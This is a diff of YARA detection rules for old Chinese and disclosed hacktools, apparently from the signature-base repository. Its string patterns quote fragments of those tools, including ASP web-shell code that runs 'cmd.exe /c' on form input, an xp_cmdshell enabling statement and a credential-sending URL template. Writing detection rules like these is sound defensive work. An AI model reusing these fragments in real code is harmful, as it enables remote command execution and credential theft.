 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e1a37f31170e812185cf00a838835ee59b8f64ba"
-		logic_hash = "341c72eaa5db1953e008423374c3f322de0f8dc33fd8181362172982b52e2b8a"
-		score = 75
+		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
+		logic_hash = "db5cc21e8c76fdd10953ba0f06c4a1ad319ee522d9def7777dad66612b51edfc"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<description>CHKen QQ:41901298</description>" fullword ascii
-		$s2 = "version=\"9.9.9.9\"" fullword ascii
-		$s3 = "name=\"CH.Ken.Tool\"" fullword ascii
+		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
+		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii
+		$s4 = "Local Host Name: %s" fullword ascii
+		$s5 = "Packed by exe32pack 1.38" fullword ascii
+		$s7 = "Local Computer Name: %s" fullword ascii
+		$s8 = "Local IP Adress: %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Ntgodmode : FILE
+rule SIGNATURE_BASE_Arttrayhookdll
 {
 	meta:
-		description = "Chinese Hacktool Set - file NtGodMode.exe"
+		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3de620bf-0405-536b-9f6d-3a7f02417b20"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L730-L747"
+		id = "324561fc-024c-5583-aa25-6b13e9616898"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1556-L1570"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8baac735e37523d28fdb6e736d03c67274f7db77"
-		logic_hash = "55efa908ebfcede207d3fe0b1072cce262af0e627e91ba8746e7a8924b8e75bd"
-		score = 75
+		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
+		logic_hash = "e43cefdb11df870f4732e74782ecefb94c0a4850c4aa994e4fbc940f523d2434"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "to HOST!" fullword ascii
-		$s1 = "SS.EXE" fullword ascii
-		$s5 = "lstrlen0" fullword ascii
-		$s6 = "Virtual" fullword ascii
-		$s19 = "RtlUnw" fullword ascii
+		$s0 = "ArtTrayHookDll.dll" fullword ascii
+		$s7 = "?TerminateHook@@YAXXZ" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 45KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Webcrack4_Routerpasswordcracking : FILE
+rule SIGNATURE_BASE_Sig_238_Eee
 {
 	meta:
-		description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe"
+		description = "Disclosed hacktool set (old stuff) - file eee.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e3d50ff8-e58d-5c60-9acd-25ba95a21f68"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L749-L766"
+		id = "9d3ad3a9-0498-5ca3-ac19-f250cb10c4d3"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1572-L1591"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "00c68d1b1aa655dfd5bb693c13cdda9dbd34c638"
-		logic_hash = "48456f82163806852ecef3d71c2c8247f6c74c31ce28472c80a914a98247bdb3"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
+		logic_hash = "b12c11f46125a33a2d7d9d02f25762c07b9d5088f70887c000b29e82a7921399"
+		score = 60
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" fullword ascii
-		$s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" fullword ascii
-		$s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" fullword ascii
-		$s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" fullword ascii
-		$s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide
+		$s0 = "szj1230@yesky.com" fullword wide
+		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
+		$s4 = "MailTo:szj1230@yesky.com" fullword wide
+		$s5 = "Command1_Click" fullword ascii
+		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
+		$s11 = "vb5chs.dll" fullword ascii
+		$s12 = "MSVBVM50.DLL" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Hscan_Gui : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Asp4
 {
 	meta:
-		description = "Chinese Hacktool Set - file hscan-gui.exe"
+		description = "Disclosed hacktool set (old stuff) - file asp4.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "27f9d2e9-0a62-57ca-9061-c32945c59c7e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L768-L783"
+		id = "7718aa71-fc0f-505c-a035-b78ae0438653"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1593-L1613"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1885f0b7be87f51c304b39bc04b9423539825c69"
-		logic_hash = "c87cfe78324638ac9d35c7fd1e47f24014c470b0892ceceaf394278d9706157b"
-		score = 75
+		hash = "faf991664fd82a8755feb65334e5130f791baa8c"
+		logic_hash = "dab19a2b92bbfe17cb860981d7bd5c3f3dd1a9e7c2ac5093fc4117f9205c1c27"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Hscan.EXE" fullword wide
-		$s1 = "RestTool.EXE" fullword ascii
-		$s3 = "Hscan Application " fullword wide
+		$s0 = "system.dll" fullword ascii
+		$s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
+		$s3 = "Public Function reboot(atype As Variant)" fullword ascii
+		$s4 = "t& = ExitWindowsEx(1, atype)" ascii
+		$s5 = "atype=request(\"atype\") " fullword ascii
+		$s7 = "AceiveX dll" fullword ascii
+		$s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
+		$s10 = "sys.reboot(atype)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_S_Multifunction_Scanners_S : FILE
+rule SIGNATURE_BASE_Aspfile1
 {
 	meta:
-		description = "Chinese Hacktool Set - file s.exe"
+		description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7fb90a59-116d-5fa7-b85b-cbb1af660666"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L785-L809"
+		id = "1b66dec0-22c8-5937-a0b2-22cbc68241ef"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1615-L1633"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "79b60ffa1c0f73b3c47e72118e0f600fcd86b355"
-		logic_hash = "96f0692c54d74388f8602a03475d95a2fcd89692dd189f9363592745a70c234b"
-		score = 75
+		hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
+		logic_hash = "4968e44f807f8ffface65e21fd8684ccfaee281b4da10f5110482c3f26ccac26"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" fullword ascii
-		$s1 = "C:\\WINDOWS\\temp\\s.exe" fullword ascii
-		$s2 = "C:\\WINDOWS\\temp\\s.exe tcp " fullword ascii
-		$s3 = "explorer.exe http://www.hackdos.com" fullword ascii
-		$s4 = "C:\\WINDOWS\\temp\\pojie.exe" fullword ascii
-		$s5 = "Failed to read file or invalid data in file!" fullword ascii
-		$s6 = "www.hackdos.com" fullword ascii
-		$s7 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
-		$s11 = "The interface of kernel library is invalid!" fullword ascii
-		$s12 = "eventvwr" fullword ascii
-		$s13 = "Failed to decompress data!" fullword ascii
-		$s14 = "NOTEPAD.EXE result.txt" fullword ascii
+		$s0 = "' -- check for a command that we have posted -- '" fullword ascii
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
+		$s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
+		$s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
+		$s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
+		$s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 4 of them
+		3 of them
 }
-rule SIGNATURE_BASE_HKTL_CN_Dos_Getpass : FILE
+rule SIGNATURE_BASE_Editserver
 {
 	meta:
-		description = "Chinese Hacktool Set - file GetPass.exe"
+		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08635096-474c-5fdf-825e-6c7c8c8d4061"
-		date = "2015-06-13"
-		modified = "2023-01-06"
-		old_rule_name = "Dos_GetPass"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L811-L830"
+		id = "de6bf995-1c7c-561f-98df-e8748d5fb157"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1635-L1657"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
-		logic_hash = "ea1410984fb1f66422faa943f1f16873f4e0d5ff1afa68c2d28f36889e214a52"
-		score = 75
+		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
+		logic_hash = "6a8f6fcf8f4a0ea5ac114150d7becbd716be0bb40cd45fd5c76a4a8a328e5e40"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "GetLogonS" ascii
-		$s3 = "/showthread.php?t=156643" ascii
-		$s8 = "To Run As Administ" ascii
-		$s18 = "EnableDebugPrivileg" fullword ascii
-		$s19 = "sedebugnameValue" fullword ascii
+		$s0 = "%s Server.exe" fullword ascii
+		$s1 = "Service Port: %s" fullword ascii
+		$s2 = "The Port Must Been >0 & <65535" fullword ascii
+		$s8 = "3--Set Server Port" fullword ascii
+		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii
+		$s13 = "Service Name: %s" fullword ascii
+		$s14 = "Server Password: %s" fullword ascii
+		$s17 = "Inject Process Name: %s" fullword ascii
+		$x1 = "WinEggDrop Shell Congirator" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 890KB and all of them
+		5 of ( $s* ) or $x1
 }
-rule SIGNATURE_BASE_HKTL_CN_Update_Pcmain : FILE
+rule SIGNATURE_BASE_Sig_238_Letmein
 {
 	meta:
-		description = "Chinese Hacktool Set - file PcMain.dll"
+		description = "Disclosed hacktool set (old stuff) - file letmein.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24c9ba6f-0772-59c9-8bea-3a8bf7823e4c"
-		date = "2015-06-13"
-		modified = "2023-01-06"
-		old_rule_name = "update_PcMain"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L832-L858"
+		id = "5dba055f-1928-534a-8d0e-11dda56d93b7"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1659-L1675"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aa68323aaec0269b0f7e697e69cce4d00a949caa"
-		logic_hash = "aa905379f65a8d964b921f2b74b61d94f97536466a7fc48f05c437d617cf35f6"
-		score = 90
+		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
+		logic_hash = "6cf454d11bc806b3a30c52b730994adb8d92613c92849162717f415e5681e417"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii
-		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
-		$s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" fullword ascii
-		$s3 = "\\svchost.exe -k " ascii
-		$s4 = "SYSTEM\\ControlSet001\\Services\\%s" fullword ascii
-		$s9 = "Global\\%s-key-event" fullword ascii
-		$s10 = "%d%d.exe" fullword ascii
-		$s14 = "%d.exe" fullword ascii
-		$s15 = "Global\\%s-key-metux" fullword ascii
-		$s18 = "GET / HTTP/1.1" fullword ascii
-		$s19 = "\\Services\\" ascii
-		$s20 = "qy001id=%d;qy001guid=%s" fullword ascii
+		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii
+		$s6 = "Error get users from server!" fullword ascii
+		$s7 = "get in nt by name and null" fullword ascii
+		$s16 = "get something from nt, hold by killusa." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_CN_Dos_Sys : FILE
+rule SIGNATURE_BASE_Sig_238_Token
 {
 	meta:
-		description = "Chinese Hacktool Set - file sys.exe"
+		description = "Disclosed hacktool set (old stuff) - file token.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c4b740f2-f4f8-59ff-ad1f-c06718040b50"
-		date = "2015-06-13"
-		modified = "2023-01-06"
-		old_rule_name = "Dos_sys"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L860-L878"
+		id = "9d0ac24b-2078-5455-8d9e-a642c71f7b2d"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1677-L1694"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b5837047443f8bc62284a0045982aaae8bab6f18"
-		logic_hash = "3b3f55c45ebfe4ab6d8e6b06a3c452c84d4f755f984d913c683a49a8fd570d9d"
-		score = 75
+		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
+		logic_hash = "88d7086a48c6a2e3801db75565184b087e663e80e2364765072fc37a5549b8b5"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "'SeDebugPrivilegeOpen " fullword ascii
-		$s6 = "Author: Cyg07*2" fullword ascii
-		$s12 = "from golds7n[LAG]'J" fullword ascii
-		$s14 = "DAMAGE" fullword ascii
+		$s0 = "Logon.exe" fullword ascii
+		$s1 = "Domain And User:" fullword ascii
+		$s2 = "PID=Get Addr$(): One" fullword ascii
+		$s3 = "Process " fullword ascii
+		$s4 = "psapi.dllK" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_CN_Dat_Xpf : FILE
+rule SIGNATURE_BASE_Sig_238_TELNET
 {
 	meta:
-		description = "Chinese Hacktool Set - file xpf.sys"
+		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fe2de535-4f86-5c29-b67e-153423a897f7"
-		date = "2015-06-13"
-		modified = "2023-01-06"
-		old_rule_name = "dat_xpf"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L880-L897"
+		id = "fae22e0f-2f69-5dc6-984c-2c07530ad11a"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1696-L1712"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "761125ab594f8dc996da4ce8ce50deba49c81846"
-		logic_hash = "c46b10ef17a9fee2be15fc9cc8b8aeec94d656b86e7208e1ad1f5efcd95fddf5"
-		score = 75
+		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
+		logic_hash = "4e90d95b7c94933ed5c50f060840291540fc99de0173298b97d2c6ccbf75d26a"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "UnHook IoGetDeviceObjectPointer ok!" fullword ascii
-		$s2 = "\\Device\\XScanPF" wide
-		$s3 = "\\DosDevices\\XScanPF" wide
+		$s0 = "TELNET [host [port]]" fullword wide
+		$s2 = "TELNET.EXE" fullword wide
+		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
+		$s14 = "Software\\Microsoft\\Telnet" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_CN_Project1 : FILE
+rule SIGNATURE_BASE_Snifferport
 {
 	meta:
-		description = "Chinese Hacktool Set - file Project1.exe"
+		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "12cc7a82-d7a9-58c6-b283-3bb0df477cd8"
-		date = "2015-06-13"
-		modified = "2023-01-06"
-		old_rule_name = "Project1"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L899-L916"
+		id = "5b903344-18d2-5d3d-be66-7260a5f3ea4b"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1714-L1731"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
-		logic_hash = "c26590f13a185eb42a27d27e6b5996f7fdf4d5c146fb74062686f356ec4db47d"
-		score = 75
+		hash = "d14133b5eaced9b7039048d0767c544419473144"
+		logic_hash = "361f1a55ed4bd5a7a5d01d346c4efd1b83e701363484282235b5aab18d3abe1a"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" fullword ascii
-		$s2 = "Password.txt" fullword ascii
-		$s3 = "LoginPrompt" fullword ascii
+		$s0 = "iphlpapi.DLL" fullword ascii
+		$s5 = "ystem\\CurrentCorolSet\\" ascii
+		$s11 = "Port.TX" fullword ascii
+		$s12 = "32Next" fullword ascii
+		$s13 = "V1.2 B" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Arp_EMP_V1_0 : FILE
+rule SIGNATURE_BASE_Sig_238_Webget
 {
 	meta:
-		description = "Chinese Hacktool Set - file Arp EMP v1.0.exe"
+		description = "Disclosed hacktool set (old stuff) - file webget.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2552f26-47ac-5fa0-941e-d674f9deccac"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L918-L931"
+		id = "b03a2463-94fe-5050-8e3d-269101a03cda"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1733-L1749"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
-		logic_hash = "e46b0f730945dad3c75b6865f30005f4d5fa09c53e3a27c275ca22da9cc89e8d"
-		score = 75
+		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
+		logic_hash = "958c465caddf6436b29042f1f1772e039d011d23ff13d91818a9d7ad21a2c750"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Arp EMP v1.0.exe" fullword wide
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "GET A HTTP/1.0" fullword ascii
+		$s2 = " error " fullword ascii
+		$s13 = "Downloa" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Myupnp : FILE
+rule SIGNATURE_BASE_Xyzcmd_Zip_Folder_Xyzcmd
 {
 	meta:
-		description = "Chinese Hacktool Set - file MyUPnP.exe"
+		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "394e19d3-882e-5a7c-a3a0-e662bd67955c"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L933-L948"
+		id = "c3d70b93-1d53-5403-bd22-d1e4bad5042b"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1751-L1767"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "15b6fca7e42cd2800ba82c739552e7ffee967000"
-		logic_hash = "0bdd0d98dc5218bbe799e5e510c5f27d74a1ef398b09962f4267f846088f726e"
-		score = 75
+		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
+		logic_hash = "ad0e8f964c7be376236b50ea370de3e433fa9e7b043663d8f32fad06997056ea"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<description>BYTELINKER.COM</description>" fullword ascii
-		$s2 = "myupnp.exe" fullword ascii
-		$s3 = "LOADER ERROR" fullword ascii
+		$s0 = "Executes Command Remotely" fullword wide
+		$s2 = "XYZCmd.exe" fullword wide
+		$s6 = "No Client Software" fullword wide
+		$s19 = "XYZCmd V1.0 For NT S" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1500KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Shiell : FILE
+rule SIGNATURE_BASE_Aspack_Chinese
 {
 	meta:
-		description = "Chinese Hacktool Set - file Shiell.exe"
+		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7ac7d79d-3f4e-54e7-bb97-ce94cbbb40a2"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L950-L966"
+		id = "ac821117-7534-5dec-9477-25be87361900"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1769-L1786"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b432d80c37abe354d344b949c8730929d8f9817a"
-		logic_hash = "44c494c24c090b21c3c201d57f910e8f4d5132a863715a090fa1e18c9d349d48"
-		score = 75
+		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
+		logic_hash = "98b3af76986cd41190612a2fdfbd9ba48f102456897f4acaedd89a40ab5a582a"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii
-		$s2 = "C:\\Windows\\System32\\Shiell.exe" fullword wide
-		$s3 = "Shift shell.exe" fullword wide
-		$s4 = "\" /v debugger /t REG_SZ /d \"" fullword wide
+		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
+		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
+		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii
+		$s8 = ";  Please, translate text only after simbol '='" fullword ascii
+		$s19 = "= Compress with ASPack" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1500KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Cndcom_Cndcom : FILE
+rule SIGNATURE_BASE_Aspbackdoor_EDIR
 {
 	meta:
-		description = "Chinese Hacktool Set - file cndcom.exe"
+		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1acfe34-03b8-5909-a226-3325fe8629ab"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L968-L988"
+		id = "0895091a-b620-5746-8245-d44716ec2bbe"
+		date = "2014-11-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1788-L1805"
